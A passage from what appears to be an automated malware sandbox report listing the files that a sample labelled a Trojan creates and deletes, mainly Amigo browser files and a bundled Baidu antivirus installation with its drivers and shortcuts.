%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\en-GB.pak (195 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\uk.pak (1648 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\VisualElements\splash-620x300.png (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ms.pak (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\master_preferences (982 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\fr.pak (251 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\zh-TW.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\el.pak (1699 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sr.pak (1636 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\gu.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sw.pak (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\VisualElementsManifest.xml (391 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ro.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\fi.pak (220 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\secondarytile.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\nacl64.exe (12289 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\chrome.exe (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\extensions\kgkggmpkealihpbjpdmcblcplljamohl.json (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\et.pak (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\da.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\uk.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\lv.pak (234 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\lt.pak (231 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\en-GB.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\nb.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\de.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sk.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\chrome_100_percent.pak (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\hu.dll (8 bytes)
%Documents and Settings%\%current user%\Desktop\ÞôýþúûðÑÂÂÑÂÂýøúø.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\chrome_frame_helper.exe (82 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\libegl.dll (107 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\en-US.pak (195 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\de.pak (234 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\cs.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sl.pak (218 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\tr.pak (231 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\chrome_touch_100_percent.pak (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\nacl_irt_x86_32.nexe (42362 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sv.pak (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\id.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\nacl_irt_x86_64.nexe (28502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\th.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\vi.pak (263 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\zh-CN.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\metro_driver.dll (1745 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\mr.pak (1748 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\MailRuUpdater.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\vk.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\agentloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\ok.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\master_preferences (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\wow_helper.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\amigo.exe (0 bytes)
The process setup.exe:380 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-PKUDN.tmp\setup.tmp (3781 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-PKUDN.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-PKUDN.tmp\setup.tmp (0 bytes)
The process F1023_s_30768.exe:3512 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDUDiskGuard.dll (7192 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\repairplugins\RepairPluginContainerConfig.xml (228 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDUDiskGuard.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerXMLScript.dat (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ad.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\SysFixerConfig.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVMC.rdb (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMDownload.dll (15336 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_customer.xml (75 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0002.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\KVTray_PluginConfig.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\TrustAndIso.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDDownLoadProtectPlugin.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\wverify.dat (15019 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsUpdate.exe (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bd0002.sys (13168 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ToastLogo.ico (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\GameNoDisturb.ini (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\WebSafePlugin.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMWrench.sys (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\white_list.dat (12088 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMStringUtils.dll (63 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bdcomproxy.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\WebMonBHO.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMNet.dll (58168 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\811.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\NetService.ini (615 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCCommunicate.dll (39 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe (9605 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUProxy64.exe (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVEng.dll (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTray\TrayPlugin.rdb (18424 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDDriverFixer.dll (1281 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMNet.dll (5873 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsIU.dll (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bdvs.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\901.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\CompatibilityChecker.dll (673 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\bdcomproxy.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMPatchAgent.dll (39 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\systemfile.dat (3 bytes)
%System%\config (576 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\806.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUpdate.exe (7385 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\HIPSClient.dll (2321 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDPerflog.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\GCCallbackBind.dll (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\monitor_config.dat (559 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0001.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDKitUtils.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKitUtils.dll (2392 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\Repair_PluginConfig.xml (411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMRepBase.dll (30968 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\GCScriptBind.dll (32128 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVRtp_PluginConfig.xml (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\virus_type.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVMainFrame.dll (33633 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\ToastLogo.ico (12024 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\bduf.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMFrameWork.dll (21480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMSkin.dll (33536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavFrame.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect_x64.dll (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\KavUpdate.dll (12536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMWindowsLib.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMUpdate.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDLogicUtils.dll (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHips.exe (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMSDWrench.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavScanS.dll (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\blacksign.dat (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSdUProxy64.exe (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\vatl.msi (6584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vatl.msi (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\900.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\directui license.txt (593 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebMonHook.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\InstallCfg.xml (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVVirusPlugins.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMUpdate.dll (12104 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GameNoDisturb.ini (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\hips_customer.xml (75 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\uninst.exe (6841 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVTrayTipsPlugin.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\hips_self_enc.xml (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度æÂ€毒\百度æÂ€毒.lnk (907 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMStringUtils.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\804.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0001.sys (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDPerflog.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_self_enc.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\7z.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bduf.dll (13584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\RtpContainerConfig.xml (818 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bd0002.dll (16424 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMDownload.dll (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\TrustAndIso.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMFrameWork.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDShellExt64.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\PrivacyProtect.dll (6360 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_customer.xml (75 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\cache_config.dat (469 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bd0001.sys (8752 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSd.exe (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMSDWrench.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMFrameWork.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMPatchAgent.dll (3104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\RtpContainerConfig.xml (818 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayDldProtect.rdb (3616 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0001.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\KVMainframePluginContainerConfig.xml (384 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMPatchAgent.dll (39 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\PrivacyProtect.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMAVE.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavEngine.dll (3312 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDLogicUtils.dll (673 bytes)
%System%\config\system (1178 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDShellExt64.dll (15168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMLog.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDLogicUtils.dll (16864 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVUpdate.rdb (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\RepairPluginContainerConfig.xml (228 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\blacksign.dat (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMStringUtils.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\InstallCfg.xml (177 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch.7z (7433 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerLuaScript.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\putips_wording.dat (580 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDLogicUtils.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\hipsClient.xml (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavScanH.dll (1856 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVCached.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVRecomm.dll (58402 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMNet.dll (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavScanM.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\PullUpConfig.xml (1524 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\updlog.dll (13 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\NetService.ini (615 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vcrt.msi (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMSkin.dll (7433 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSREng.dll (1425 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\NetService.ini (615 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdBugRpt.exe (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerConfig.dat (1 bytes)
%Documents and Settings%\All Users\Desktop\百度æÂ€毒.lnk (895 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\baidusdRepair.dll (6360 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDArKit.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\dl.dll (14988 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsBugRpt.exe (3361 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMDownload.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCCallbackBind.dll (39 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\Cooly_PluginConfig.xml (726 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\DesktopToast.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\res\InstallWnd.zip (12536 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMTinyXml.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\coolyplugins\CoolyContainerConfig.xml (329 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMUpdate.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayPullUpWS.rdb (3616 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMScriptVM.dll (1281 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDArKit.sys (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\KavUpdate.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMReport.dll (23504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BSRLib.dat (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\Database\bdmp.dat (32 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\kav_verify.dat (677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\app.ico (12024 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanH.dll (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\DesktopToast.exe (3616 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\wverify.dat (15019 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVRecomm.dll (13122 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayPlugin.rdb (9608 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMPatchAgent.dll (43 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_self_enc.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\dl.dll (65930 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMDbSqlite.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\uninst.exe (29256 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\tips.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDConfig.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTray.rdb (1552 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\TrustAndIso.dll (1425 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsIU.dll (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTips.rdb (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMPerfMon.dll (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\GCCommunicate.dll (1552 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsBugRpt.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\Cooly_PluginConfig.xml (726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavScanV.dll (2392 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\900.dat (8 bytes)
%System%\drivers\bd0003.sys (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\systemfile.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\monitor_config.dat (559 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\updlog.dll (13 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVTrayTipsPlugin.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVDownloadProtect_x64.dll (6360 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCScriptBind.dll (7345 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\placeholder_tmp (11 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\7z.dll (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\DriverManager.dll (601 bytes)
